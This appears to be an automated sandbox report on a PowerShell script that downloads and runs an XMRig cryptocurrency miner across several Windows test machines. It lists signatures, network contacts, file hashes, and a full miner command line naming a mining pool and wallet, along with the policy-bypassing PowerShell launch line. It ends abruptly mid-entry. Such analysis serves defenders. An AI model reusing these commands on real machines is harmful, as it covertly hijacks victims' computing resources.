Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
SE 184.31.15.137:443 www.bing.com tcp
US 8.8.8.8:53 137.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 21.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 2.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fnhvxse4.2bi.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral30

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:38

Platform

win10-20240404-en

Max time kernel

1792s

Max time network

1782s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 194.98.74.40.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 56.94.73.104.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_blmdw4r0.n3i.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral5

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:05

Platform

win10v2004-20240508-en

Max time kernel

1792s

Max time network

1749s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 91.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 97.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 31.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 109.116.69.13.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0phwvvn1.ft3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral13

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:17

Platform

win7-20240221-en

Max time kernel

1558s

Max time network

1559s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Network

N/A

Files

Analysis: behavioral14

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:19

Platform

win10-20240404-en

Max time kernel

1791s

Max time network

1771s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 14.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uxevpgru.uwt.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/164-25-0x00007FF9DE720000-0x00007FF9DF10C000-memory.dmp

memory/164-48-0x00000225759E0000-0x00000225759F2000-memory.dmp

memory/164-61-0x0000022575630000-0x000002257563A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral25

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:37

Platform

win10v2004-20240508-en

Max time kernel

1789s

Max time network

1765s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 211.143.182.52.in-addr.arpa udp

Files

memory/4448-0-0x00007FFD85903000-0x00007FFD85905000-memory.dmp

memory/4448-7-0x0000025EEC250000-0x0000025EEC272000-memory.dmp

memory/4448-11-0x00007FFD85900000-0x00007FFD863C1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zvzatrc3.dil.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral8

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:05

Platform

win11-20240426-en

Max time kernel

1797s

Max time network

1779s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

memory/1008-0-0x00007FFA858C3000-0x00007FFA858C5000-memory.dmp

memory/1008-1-0x000001E179F40000-0x000001E179F62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qfdz53cd.1yy.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral17

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:24

Platform

win10v2004-20240226-en

Max time kernel

1805s

Max time network

1804s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver


Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4292 --field-trial-handle=2656,i,16940681401824032220,151921362336696246,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3648 --field-trial-handle=2656,i,16940681401824032220,151921362336696246,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rwqsztt4.2kd.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral27

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:38

Platform

win10v2004-20240426-en

Max time kernel

1799s

Max time network

1801s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner

